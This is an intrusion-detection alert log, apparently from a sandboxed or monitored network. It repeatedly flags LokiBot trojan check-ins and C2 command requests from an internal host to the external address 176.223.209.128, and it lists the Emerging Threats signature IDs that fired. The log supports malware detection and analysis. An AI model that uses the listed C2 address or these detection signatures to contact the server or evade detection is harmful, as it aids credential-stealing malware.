11/25/21-10:52:28.263374	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50352	80	192.168.11.20	176.223.209.128
11/25/21-10:52:28.747393	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50353	80	192.168.11.20	176.223.209.128
11/25/21-10:52:28.747393	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50353	80	192.168.11.20	176.223.209.128
11/25/21-10:52:28.747393	TCP	2025381	ET TROJAN LokiBot Checkin	50353	80	192.168.11.20	176.223.209.128
11/25/21-10:52:28.747393	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50353	80	192.168.11.20	176.223.209.128
11/25/21-10:52:29.178594	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50354	80	192.168.11.20	176.223.209.128
11/25/21-10:52:29.178594	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50354	80	192.168.11.20	176.223.209.128
11/25/21-10:52:29.178594	TCP	2025381	ET TROJAN LokiBot Checkin	50354	80	192.168.11.20	176.223.209.128
11/25/21-10:52:29.178594	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50354	80	192.168.11.20	176.223.209.128
11/25/21-10:52:29.689703	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50355	80	192.168.11.20	176.223.209.128
11/25/21-10:52:29.689703	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50355	80	192.168.11.20	176.223.209.128
11/25/21-10:52:29.689703	TCP	2025381	ET TROJAN LokiBot Checkin	50355	80	192.168.11.20	176.223.209.128
11/25/21-10:52:29.689703	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50355	80	192.168.11.20	176.223.209.128
11/25/21-10:52:30.160809	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50356	80	192.168.11.20	176.223.209.128
11/25/21-10:52:30.160809	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50356	80	192.168.11.20	176.223.209.128
11/25/21-10:52:30.160809	TCP	2025381	ET TROJAN LokiBot Checkin	50356	80	192.168.11.20	176.223.209.128
11/25/21-10:52:30.160809	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50356	80	192.168.11.20	176.223.209.128
11/25/21-10:52:30.684075	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50357	80	192.168.11.20	176.223.209.128
11/25/21-10:52:30.684075	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50357	80	192.168.11.20	176.223.209.128
11/25/21-10:52:30.684075	TCP	2025381	ET TROJAN LokiBot Checkin	50357	80	192.168.11.20	176.223.209.128
11/25/21-10:52:30.684075	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50357	80	192.168.11.20	176.223.209.128
11/25/21-10:52:31.132269	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50358	80	192.168.11.20	176.223.209.128
11/25/21-10:52:31.132269	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50358	80	192.168.11.20	176.223.209.128
11/25/21-10:52:31.132269	TCP	2025381	ET TROJAN LokiBot Checkin	50358	80	192.168.11.20	176.223.209.128
11/25/21-10:52:31.132269	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50358	80	192.168.11.20	176.223.209.128
11/25/21-10:52:31.643581	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50359	80	192.168.11.20	176.223.209.128
11/25/21-10:52:31.643581	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50359	80	192.168.11.20	176.223.209.128
11/25/21-10:52:31.643581	TCP	2025381	ET TROJAN LokiBot Checkin	50359	80	192.168.11.20	176.223.209.128
11/25/21-10:52:31.643581	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50359	80	192.168.11.20	176.223.209.128
11/25/21-10:52:32.168793	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50360	80	192.168.11.20	176.223.209.128
11/25/21-10:52:32.168793	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50360	80	192.168.11.20	176.223.209.128
11/25/21-10:52:32.168793	TCP	2025381	ET TROJAN LokiBot Checkin	50360	80	192.168.11.20	176.223.209.128
11/25/21-10:52:32.168793	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50360	80	192.168.11.20	176.223.209.128
11/25/21-10:52:32.703571	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50361	80	192.168.11.20	176.223.209.128
11/25/21-10:52:32.703571	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50361	80	192.168.11.20	176.223.209.128
11/25/21-10:52:32.703571	TCP	2025381	ET TROJAN LokiBot Checkin	50361	80	192.168.11.20	176.223.209.128
11/25/21-10:52:32.703571	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50361	80	192.168.11.20	176.223.209.128
11/25/21-10:52:33.165058	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50362	80	192.168.11.20	176.223.209.128
11/25/21-10:52:33.165058	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50362	80	192.168.11.20	176.223.209.128
11/25/21-10:52:33.165058	TCP	2025381	ET TROJAN LokiBot Checkin	50362	80	192.168.11.20	176.223.209.128
11/25/21-10:52:33.165058	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50362	80	192.168.11.20	176.223.209.128
11/25/21-10:52:33.675960	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50363	80	192.168.11.20	176.223.209.128
11/25/21-10:52:33.675960	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50363	80	192.168.11.20	176.223.209.128
11/25/21-10:52:33.675960	TCP	2025381	ET TROJAN LokiBot Checkin	50363	80	192.168.11.20	176.223.209.128
11/25/21-10:52:33.675960	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50363	80	192.168.11.20	176.223.209.128
11/25/21-10:52:34.188796	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50364	80	192.168.11.20	176.223.209.128
11/25/21-10:52:34.188796	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50364	80	192.168.11.20	176.223.209.128
11/25/21-10:52:34.188796	TCP	2025381	ET TROJAN LokiBot Checkin	50364	80	192.168.11.20	176.223.209.128
11/25/21-10:52:34.188796	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50364	80	192.168.11.20	176.223.209.128
11/25/21-10:52:34.702326	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50365	80	192.168.11.20	176.223.209.128
11/25/21-10:52:34.702326	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50365	80	192.168.11.20	176.223.209.128
11/25/21-10:52:34.702326	TCP	2025381	ET TROJAN LokiBot Checkin	50365	80	192.168.11.20	176.223.209.128
11/25/21-10:52:34.702326	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50365	80	192.168.11.20	176.223.209.128
11/25/21-10:52:35.210581	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50366	80	192.168.11.20	176.223.209.128
11/25/21-10:52:35.210581	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50366	80	192.168.11.20	176.223.209.128
11/25/21-10:52:35.210581	TCP	2025381	ET TROJAN LokiBot Checkin	50366	80	192.168.11.20	176.223.209.128
11/25/21-10:52:35.210581	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50366	80	192.168.11.20	176.223.209.128
11/25/21-10:52:35.688599	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50367	80	192.168.11.20	176.223.209.128
11/25/21-10:52:35.688599	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50367	80	192.168.11.20	176.223.209.128
11/25/21-10:52:35.688599	TCP	2025381	ET TROJAN LokiBot Checkin	50367	80	192.168.11.20	176.223.209.128
11/25/21-10:52:35.688599	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50367	80	192.168.11.20	176.223.209.128
11/25/21-10:52:36.166352	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50368	80	192.168.11.20	176.223.209.128
11/25/21-10:52:36.166352	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50368	80	192.168.11.20	176.223.209.128
11/25/21-10:52:36.166352	TCP	2025381	ET TROJAN LokiBot Checkin	50368	80	192.168.11.20	176.223.209.128
11/25/21-10:52:36.166352	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50368	80	192.168.11.20	176.223.209.128
11/25/21-10:52:36.667414	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50369	80	192.168.11.20	176.223.209.128
11/25/21-10:52:36.667414	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50369	80	192.168.11.20	176.223.209.128
11/25/21-10:52:36.667414	TCP	2025381	ET TROJAN LokiBot Checkin	50369	80	192.168.11.20	176.223.209.128
11/25/21-10:52:36.667414	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50369	80	192.168.11.20	176.223.209.128
11/25/21-10:52:37.177630	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50370	80	192.168.11.20	176.223.209.128
11/25/21-10:52:37.177630	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50370	80	192.168.11.20	176.223.209.128
11/25/21-10:52:37.177630	TCP	2025381	ET TROJAN LokiBot Checkin	50370	80	192.168.11.20	176.223.209.128
11/25/21-10:52:37.177630	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50370	80	192.168.11.20	176.223.209.128
11/25/21-10:52:37.684362	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50371	80	192.168.11.20	176.223.209.128
11/25/21-10:52:37.684362	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50371	80	192.168.11.20	176.223.209.128
11/25/21-10:52:37.684362	TCP	2025381	ET TROJAN LokiBot Checkin	50371	80	192.168.11.20	176.223.209.128
11/25/21-10:52:37.684362	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50371	80	192.168.11.20	176.223.209.128
11/25/21-10:52:38.201110	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50372	80	192.168.11.20	176.223.209.128
11/25/21-10:52:38.201110	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50372	80	192.168.11.20	176.223.209.128
11/25/21-10:52:38.201110	TCP	2025381	ET TROJAN LokiBot Checkin	50372	80	192.168.11.20	176.223.209.128
11/25/21-10:52:38.201110	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50372	80	192.168.11.20	176.223.209.128
11/25/21-10:52:38.676993	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50373	80	192.168.11.20	176.223.209.128
11/25/21-10:52:38.676993	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50373	80	192.168.11.20	176.223.209.128
11/25/21-10:52:38.676993	TCP	2025381	ET TROJAN LokiBot Checkin	50373	80	192.168.11.20	176.223.209.128
11/25/21-10:52:38.676993	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50373	80	192.168.11.20	176.223.209.128
11/25/21-10:52:39.142414	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50374	80	192.168.11.20	176.223.209.128
11/25/21-10:52:39.142414	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50374	80	192.168.11.20	176.223.209.128
11/25/21-10:52:39.142414	TCP	2025381	ET TROJAN LokiBot Checkin	50374	80	192.168.11.20	176.223.209.128
11/25/21-10:52:39.142414	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50374	80	192.168.11.20	176.223.209.128
11/25/21-10:52:39.619722	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50375	80	192.168.11.20	176.223.209.128
11/25/21-10:52:39.619722	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50375	80	192.168.11.20	176.223.209.128
11/25/21-10:52:39.619722	TCP	2025381	ET TROJAN LokiBot Checkin	50375	80	192.168.11.20	176.223.209.128
11/25/21-10:52:39.619722	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50375	80	192.168.11.20	176.223.209.128
11/25/21-10:52:40.167312	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50376	80	192.168.11.20	176.223.209.128
11/25/21-10:52:40.167312	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50376	80	192.168.11.20	176.223.209.128
11/25/21-10:52:40.167312	TCP	2025381	ET TROJAN LokiBot Checkin	50376	80	192.168.11.20	176.223.209.128
11/25/21-10:52:40.167312	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50376	80	192.168.11.20	176.223.209.128
11/25/21-10:52:40.668286	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50377	80	192.168.11.20	176.223.209.128
11/25/21-10:52:40.668286	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50377	80	192.168.11.20	176.223.209.128
11/25/21-10:52:40.668286	TCP	2025381	ET TROJAN LokiBot Checkin	50377	80	192.168.11.20	176.223.209.128
11/25/21-10:52:40.668286	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50377	80	192.168.11.20	176.223.209.128
11/25/21-10:52:41.168892	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50378	80	192.168.11.20	176.223.209.128
11/25/21-10:52:41.168892	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50378	80	192.168.11.20	176.223.209.128
11/25/21-10:52:41.168892	TCP	2025381	ET TROJAN LokiBot Checkin	50378	80	192.168.11.20	176.223.209.128
11/25/21-10:52:41.168892	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50378	80	192.168.11.20	176.223.209.128
11/25/21-10:52:41.613994	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50379	80	192.168.11.20	176.223.209.128
11/25/21-10:52:41.613994	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50379	80	192.168.11.20	176.223.209.128
11/25/21-10:52:41.613994	TCP	2025381	ET TROJAN LokiBot Checkin	50379	80	192.168.11.20	176.223.209.128
11/25/21-10:52:41.613994	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50379	80	192.168.11.20	176.223.209.128
11/25/21-10:52:42.127400	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50380	80	192.168.11.20	176.223.209.128
11/25/21-10:52:42.127400	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50380	80	192.168.11.20	176.223.209.128
11/25/21-10:52:42.127400	TCP	2025381	ET TROJAN LokiBot Checkin	50380	80	192.168.11.20	176.223.209.128
11/25/21-10:52:42.127400	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50380	80	192.168.11.20	176.223.209.128
11/25/21-10:52:42.627468	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50381	80	192.168.11.20	176.223.209.128
11/25/21-10:52:42.627468	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50381	80	192.168.11.20	176.223.209.128
11/25/21-10:52:42.627468	TCP	2025381	ET TROJAN LokiBot Checkin	50381	80	192.168.11.20	176.223.209.128
11/25/21-10:52:42.627468	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50381	80	192.168.11.20	176.223.209.128
11/25/21-10:52:43.136376	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50382	80	192.168.11.20	176.223.209.128
11/25/21-10:52:43.136376	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50382	80	192.168.11.20	176.223.209.128
11/25/21-10:52:43.136376	TCP	2025381	ET TROJAN LokiBot Checkin	50382	80	192.168.11.20	176.223.209.128
11/25/21-10:52:43.136376	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50382	80	192.168.11.20	176.223.209.128
11/25/21-10:52:43.624345	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50383	80	192.168.11.20	176.223.209.128
11/25/21-10:52:43.624345	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50383	80	192.168.11.20	176.223.209.128
11/25/21-10:52:43.624345	TCP	2025381	ET TROJAN LokiBot Checkin	50383	80	192.168.11.20	176.223.209.128
11/25/21-10:52:43.624345	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50383	80	192.168.11.20	176.223.209.128
11/25/21-10:52:44.069423	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50384	80	192.168.11.20	176.223.209.128
11/25/21-10:52:44.069423	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50384	80	192.168.11.20	176.223.209.128
11/25/21-10:52:44.069423	TCP	2025381	ET TROJAN LokiBot Checkin	50384	80	192.168.11.20	176.223.209.128
11/25/21-10:52:44.069423	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50384	80	192.168.11.20	176.223.209.128
11/25/21-10:52:44.502012	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50385	80	192.168.11.20	176.223.209.128
11/25/21-10:52:44.502012	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50385	80	192.168.11.20	176.223.209.128
11/25/21-10:52:44.502012	TCP	2025381	ET TROJAN LokiBot Checkin	50385	80	192.168.11.20	176.223.209.128
11/25/21-10:52:44.502012	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50385	80	192.168.11.20	176.223.209.128
11/25/21-10:52:45.027630	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50386	80	192.168.11.20	176.223.209.128
11/25/21-10:52:45.027630	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50386	80	192.168.11.20	176.223.209.128
11/25/21-10:52:45.027630	TCP	2025381	ET TROJAN LokiBot Checkin	50386	80	192.168.11.20	176.223.209.128
11/25/21-10:52:45.027630	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50386	80	192.168.11.20	176.223.209.128
11/25/21-10:52:45.511486	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50387	80	192.168.11.20	176.223.209.128
11/25/21-10:52:45.511486	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50387	80	192.168.11.20	176.223.209.128
11/25/21-10:52:45.511486	TCP	2025381	ET TROJAN LokiBot Checkin	50387	80	192.168.11.20	176.223.209.128
11/25/21-10:52:45.511486	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50387	80	192.168.11.20	176.223.209.128
11/25/21-10:52:46.026918	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50388	80	192.168.11.20	176.223.209.128
11/25/21-10:52:46.026918	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50388	80	192.168.11.20	176.223.209.128
11/25/21-10:52:46.026918	TCP	2025381	ET TROJAN LokiBot Checkin	50388	80	192.168.11.20	176.223.209.128
11/25/21-10:52:46.026918	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50388	80	192.168.11.20	176.223.209.128
11/25/21-10:52:46.539469	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50389	80	192.168.11.20	176.223.209.128
11/25/21-10:52:46.539469	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50389	80	192.168.11.20	176.223.209.128
11/25/21-10:52:46.539469	TCP	2025381	ET TROJAN LokiBot Checkin	50389	80	192.168.11.20	176.223.209.128
11/25/21-10:52:46.539469	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50389	80	192.168.11.20	176.223.209.128
11/25/21-10:52:47.049389	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50390	80	192.168.11.20	176.223.209.128
11/25/21-10:52:47.049389	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50390	80	192.168.11.20	176.223.209.128
11/25/21-10:52:47.049389	TCP	2025381	ET TROJAN LokiBot Checkin	50390	80	192.168.11.20	176.223.209.128
11/25/21-10:52:47.049389	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50390	80	192.168.11.20	176.223.209.128
11/25/21-10:52:47.487560	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50391	80	192.168.11.20	176.223.209.128
11/25/21-10:52:47.487560	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50391	80	192.168.11.20	176.223.209.128
11/25/21-10:52:47.487560	TCP	2025381	ET TROJAN LokiBot Checkin	50391	80	192.168.11.20	176.223.209.128
11/25/21-10:52:47.487560	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50391	80	192.168.11.20	176.223.209.128
11/25/21-10:52:48.019785	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50392	80	192.168.11.20	176.223.209.128
11/25/21-10:52:48.019785	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50392	80	192.168.11.20	176.223.209.128
11/25/21-10:52:48.019785	TCP	2025381	ET TROJAN LokiBot Checkin	50392	80	192.168.11.20	176.223.209.128
11/25/21-10:52:48.019785	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50392	80	192.168.11.20	176.223.209.128
11/25/21-10:52:48.541433	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50393	80	192.168.11.20	176.223.209.128
11/25/21-10:52:48.541433	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50393	80	192.168.11.20	176.223.209.128
11/25/21-10:52:48.541433	TCP	2025381	ET TROJAN LokiBot Checkin	50393	80	192.168.11.20	176.223.209.128
11/25/21-10:52:48.541433	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50393	80	192.168.11.20	176.223.209.128
11/25/21-10:52:49.054536	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50394	80	192.168.11.20	176.223.209.128
11/25/21-10:52:49.054536	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50394	80	192.168.11.20	176.223.209.128
11/25/21-10:52:49.054536	TCP	2025381	ET TROJAN LokiBot Checkin	50394	80	192.168.11.20	176.223.209.128
11/25/21-10:52:49.054536	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50394	80	192.168.11.20	176.223.209.128
11/25/21-10:52:49.554648	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50395	80	192.168.11.20	176.223.209.128
11/25/21-10:52:49.554648	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50395	80	192.168.11.20	176.223.209.128
11/25/21-10:52:49.554648	TCP	2025381	ET TROJAN LokiBot Checkin	50395	80	192.168.11.20	176.223.209.128
11/25/21-10:52:49.554648	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50395	80	192.168.11.20	176.223.209.128
11/25/21-10:52:50.100165	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50396	80	192.168.11.20	176.223.209.128
11/25/21-10:52:50.100165	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50396	80	192.168.11.20	176.223.209.128
11/25/21-10:52:50.100165	TCP	2025381	ET TROJAN LokiBot Checkin	50396	80	192.168.11.20	176.223.209.128
11/25/21-10:52:50.100165	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50396	80	192.168.11.20	176.223.209.128
11/25/21-10:52:50.619973	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50397	80	192.168.11.20	176.223.209.128
11/25/21-10:52:50.619973	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50397	80	192.168.11.20	176.223.209.128
11/25/21-10:52:50.619973	TCP	2025381	ET TROJAN LokiBot Checkin	50397	80	192.168.11.20	176.223.209.128
11/25/21-10:52:50.619973	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50397	80	192.168.11.20	176.223.209.128
11/25/21-10:52:51.114069	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50398	80	192.168.11.20	176.223.209.128
11/25/21-10:52:51.114069	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50398	80	192.168.11.20	176.223.209.128
11/25/21-10:52:51.114069	TCP	2025381	ET TROJAN LokiBot Checkin	50398	80	192.168.11.20	176.223.209.128
11/25/21-10:52:51.114069	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50398	80	192.168.11.20	176.223.209.128
11/25/21-10:52:51.626206	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50399	80	192.168.11.20	176.223.209.128
11/25/21-10:52:51.626206	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50399	80	192.168.11.20	176.223.209.128
11/25/21-10:52:51.626206	TCP	2025381	ET TROJAN LokiBot Checkin	50399	80	192.168.11.20	176.223.209.128
11/25/21-10:52:51.626206	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50399	80	192.168.11.20	176.223.209.128
11/25/21-10:52:52.072016	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50400	80	192.168.11.20	176.223.209.128
11/25/21-10:52:52.072016	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50400	80	192.168.11.20	176.223.209.128
11/25/21-10:52:52.072016	TCP	2025381	ET TROJAN LokiBot Checkin	50400	80	192.168.11.20	176.223.209.128
11/25/21-10:52:52.072016	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50400	80	192.168.11.20	176.223.209.128
11/25/21-10:52:52.565168	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50401	80	192.168.11.20	176.223.209.128
11/25/21-10:52:52.565168	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50401	80	192.168.11.20	176.223.209.128
11/25/21-10:52:52.565168	TCP	2025381	ET TROJAN LokiBot Checkin	50401	80	192.168.11.20	176.223.209.128
11/25/21-10:52:52.565168	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50401	80	192.168.11.20	176.223.209.128
11/25/21-10:52:53.024229	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50402	80	192.168.11.20	176.223.209.128
11/25/21-10:52:53.024229	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50402	80	192.168.11.20	176.223.209.128
11/25/21-10:52:53.024229	TCP	2025381	ET TROJAN LokiBot Checkin	50402	80	192.168.11.20	176.223.209.128
11/25/21-10:52:53.024229	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50402	80	192.168.11.20	176.223.209.128
11/25/21-10:52:53.467348	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50403	80	192.168.11.20	176.223.209.128
11/25/21-10:52:53.467348	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50403	80	192.168.11.20	176.223.209.128
11/25/21-10:52:53.467348	TCP	2025381	ET TROJAN LokiBot Checkin	50403	80	192.168.11.20	176.223.209.128
11/25/21-10:52:53.467348	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50403	80	192.168.11.20	176.223.209.128
11/25/21-10:52:53.974143	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50404	80	192.168.11.20	176.223.209.128
11/25/21-10:52:53.974143	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50404	80	192.168.11.20	176.223.209.128
11/25/21-10:52:53.974143	TCP	2025381	ET TROJAN LokiBot Checkin	50404	80	192.168.11.20	176.223.209.128
11/25/21-10:52:53.974143	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50404	80	192.168.11.20	176.223.209.128
11/25/21-10:52:54.487405	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50405	80	192.168.11.20	176.223.209.128
11/25/21-10:52:54.487405	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50405	80	192.168.11.20	176.223.209.128
11/25/21-10:52:54.487405	TCP	2025381	ET TROJAN LokiBot Checkin	50405	80	192.168.11.20	176.223.209.128
11/25/21-10:52:54.487405	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50405	80	192.168.11.20	176.223.209.128
11/25/21-10:52:54.982708	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50406	80	192.168.11.20	176.223.209.128
11/25/21-10:52:54.982708	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50406	80	192.168.11.20	176.223.209.128
11/25/21-10:52:54.982708	TCP	2025381	ET TROJAN LokiBot Checkin	50406	80	192.168.11.20	176.223.209.128
11/25/21-10:52:54.982708	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50406	80	192.168.11.20	176.223.209.128
11/25/21-10:52:55.566183	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50407	80	192.168.11.20	176.223.209.128
